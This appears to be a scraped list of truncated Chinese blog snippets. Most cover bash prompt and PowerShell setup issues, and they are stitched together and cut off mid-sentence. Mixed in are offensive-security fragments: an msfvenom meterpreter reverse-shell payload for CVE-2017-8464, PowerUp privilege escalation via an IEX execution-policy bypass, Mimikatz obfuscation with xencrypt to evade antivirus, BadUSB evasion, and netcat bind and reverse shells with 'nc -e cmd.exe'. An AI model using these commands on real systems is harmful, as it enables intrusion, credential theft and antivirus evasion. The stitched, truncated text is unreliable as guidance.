搭建Kali攻击机,ip地址为192.168.88.136。当Windows系统在解析powershell快捷方式时,存在远程执行任意代码的漏洞(CVE-2017-8464)。 生成攻击文件<search.ps1> msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.136 lport=5555 -f psh-reflection > /var/ww
在官网下载源码包 https://mirrors.edge.kernel.org/pub/software/scm/git/ 编译安装 tar xf git-2.27.0.tar.gzcd git-2.27.0yum install gcc zlib-devel.x86_64./configure --prefix=/usr/local/git && make && make install Git 命令补全设置 cd ./contrib/completionmv g
近源渗透测试badusb执行代码的免杀 在进行近源渗透测试的时候,我们发现国内杀软对powershell的管制非常的严格,只要有后台隐藏执行的powershell都会触发可疑行为警报,但是这不代表不能绕过。 生成powershell payload 如图生成payload,我们使用powershell的payload,就不用勾选64位了 p
介绍几个常用模块的实战应用。 实战一 在此实战中,用到了Invoke-AllChecks、Install-ServiceBinary、Get-ServiceUnquoted、Test-ServiceDaclPermission、Restore-ServiceBinary这几个模块。 先加载Powerup脚本,然后执行Invoke-AlChecks,脚本将进行所有检查。 将PowerUp脚本上传至目
在使用power shell运行cnpm时报错 cnpm : 无法加载文件 C:\Users\hp\AppData\Roaming\npm\cnpm.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies。所在位置 行:1 字符: 1 cnpm install amfe-fle
问题1 E558: Terminal entry not found in terminfo 方法 在.bashrc加上 export TERM=xterm 问题2 终端提示符难看 方法 在.bashrc加上 export PS1="[\[\e[1;34;40m\]\u@\h\[\e[m\] \W]$ "
export PS1="(\$?)${PS1}" Linux 状态码的意义 0 命令成功结束 1 通用未知错误 2 误用shell命令 126 命令不可执行 127 没找到命令 128 无效退出参数 128+x Linux 信号x的严重错误 130 Linux 信号2 的严重错误,即命令通过SIGINT(Ctrl+C)终止 255 退出状态码越界
centos命令提示符显示完整目录 配置方法: 1.编辑profile文件,添加环境变量PS1 su root //切换到root用户 vim /etc/profile //打开profile文件 在profile内容最下面添加如下内容: export PS1='[\u@\h `pwd`]\$' 2.保存退出,使profile修改生效 source /etc/profile 3.查看命令提示符
1 故障 [root@master ~]# hostnamectl set-hostname --static master.host.com [root@master ~]# exec -l bash [root@master ~]# [root@master ~]# exec -l bash [root@master ~]# exec -l bash [root@master ~]# 登出 #更改主机名格式为F
工具地址:https://github.com/the-xentropy/xencrypt在混淆加密前,杀毒引擎的结果如下:使用方法:Import-Module ./xencrypt.ps1Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1对Mimikatz工具进行了处理后,也可以多次进行混淆加密,Invoke-Xencrypt -InFile invoke-mi
scoop是可用于windows的一款包管理工具,今天试着安装了一下,在这里记录一些遇到的问题和解决方法。 安装流程 先进入powershell,windows徽标键输入powershell或者cmd输入powershell均可 然后先输入以下代码,以保证后面的脚本有运行权限 set-executionpolicy remotesigned -scope curre
很多时候我们需要在一个脚本文件执行另外一个脚本文件,比如我们有一个Test.ps1文件 我们有以下2种方法: Invoke-Expression (&) 我们可以看到,Test.ps1中的代码确实执行了,而且两个文件中的变量即使名称相同也是互不影响,因为在各自的作用域内。 点操作符 这个我们可以看到,执行Te
打包后,浏览器浏览index.html文件空白,或者无法跳转。 解决办法: // 主要原因时由于打包后的文件路径错误,在项目目录下建一个vue.config.js文件 // 进行如下设置 module.exports = { publicPath:'./' // 设置打包后文件的引用路径为相对于dist目录下的文件 } 安装vu
命令提示符PS1(大写ps加数字1)变量内容: PS1=’[\u@\h \W]$ '(系统默认格式) \d :可显示出『星期 月 日』的日期格式,如:“Mon Feb 2” \H :完整的主机名。 \h :仅取主机名在第一个小数点之前的名字 \t :显示时间,为 24 小时格式的『HH:MM:SS』 \T :显示时间,为 12 小时格式的『HH:MM:SS』
解决 点赞 收藏 分享 文章举报 于丸 发布了125 篇原创文章 · 获赞 4 · 访问量 1万+ 私信 关注
登陆MySQL都是使用命令行的,在使用的时候不想敲,觉得麻烦,就写了几个Win10下面的PowerShell,类似以前Win7下面的bat或cmd处理命令,提高了使用效率,很方便 启动MySQL - start.ps1(注意后缀.ps1) .\bin\mysqld --console 登录MySQL - login.ps1 .\bin\mysql -u hecg -p123456 关闭MySQL
PowerUp攻击模块实战 1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行 2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。 powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\PowerUp.ps1'); Invoke-AllChecks" 由
gulp : 无法加载文件 C:\Users\Administrator\AppData\Roaming\npm\gulp.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies。所在位置 行:1 字符: 1+ gulp serve+ ~~~~ + CategoryInfo
一、pwd:显示当前所在的位置 语法 pwd [选项] ... 描述 打印当前工作目录的完整文件名。 -L,--logical 从环境使用PWD,即使它包含符号链接 -P,--physical 避免所有符
修改命令提示符颜色 修改命令提示符的话,只需修改PS1环境变量即可。 PS1='\[\033[01;31m\][\u@\h \W]$ \[\033[00m\]' 效果如图: 修改命令输入的颜色 修改命令输入的颜色,思路是不关闭PS1的颜色,然后在每次敲下回车键执行命令的时候自动插入颜色终止符。这需要借助trap捕获DEBUG信号
1、tar -xvf [文件名] 解压某个文件,并显示解压的详细过程 tar -x 解压 -v 显示详细过程 -f 后面接文件名,-f必须在最后 2、chmod 777 -R [文件名/文件夹] 赋予某个文件最高权限 3、export PS1='[\u@\h \w]\$ ' 及时生效 echo "export PS1='[\u@\h \w]\$
我想在.bashrc文件中更改我的PS1. 我找到了一个使用带有%q指令的printf来转义字符的脚本: #!/bin/bash STR=$(printf "%q" "PS1=\u@\h:\w\$") sed -i '/PS1/c\'"$STR" ~/.bashrc 问题是我收到此错误: script.sh: 2: printf: %q: invalid directive 任何的想法 ?也许另一种逃避角色
参照: https://www.cnblogs.com/tdcqma/p/6714492.html Mac终端的主机名称+用户名全部显示出来的话会可能显得特别长,影响整体美观,可以切换至root用户后 修改.bashrc文件进行格式化。 1. 终端中切换root用户 su - root 2. 修改/etc/bashrc文件中的PS1='\h:\W \u\$ ',其中\h代表主机
原文链接:http://www.cnblogs.com/sunjie21/archive/2012/11/07/2758275.html 修改.bashrc文件。 第56行: if [ "$color_prompt" = yes ]; then PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\03
NC 反弹 shell 攻击场景: Victim IP: 192.168.2.10 Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cmd服务,然后在攻击机上进行连接 反向 Shell Attacker:nc